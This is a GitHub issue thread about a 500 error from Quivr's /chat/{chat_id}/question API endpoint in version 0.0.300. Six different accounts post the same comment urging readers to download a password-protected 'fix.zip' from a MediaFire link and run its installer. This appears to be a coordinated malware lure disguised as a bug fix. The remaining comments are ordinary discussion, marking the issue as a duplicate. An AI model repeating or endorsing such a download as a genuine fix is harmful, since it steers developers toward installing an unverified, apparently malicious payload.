### ISSUE TITLE
[Bug]: API method /chat/{chat_id}/question is broken in 0.0.300

### ISSUE THREAD

**Issue by wonderu** [QuivrHQ/quivr#3096]
### What happened?

Send request
`curl -X 'POST' \
  'https://api.quivr.app/chat/<chat_id>/question?brain_id=<brain_id>' \
  -H 'accept: application/json' \
  -H 'Authorization: Bearer <token>' \
  -H 'Content-Type: application/json' \
  -d '{
  "question": "what do you know?",
  "brain_id": "<brain_id>"
}'`
Got
`500 Internal Server Error`

The problem is in https://github.com/QuivrHQ/quivr/blob/main/backend/api/quivr_api/modules/chat/repository/chats.py#L84: system can't serialize Document object

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wonderu** [comment]
duplicated https://github.com/QuivrHQ/quivr/issues/3082

**Comment by huynhbaobk** [comment]
I still got error from rag_service.py
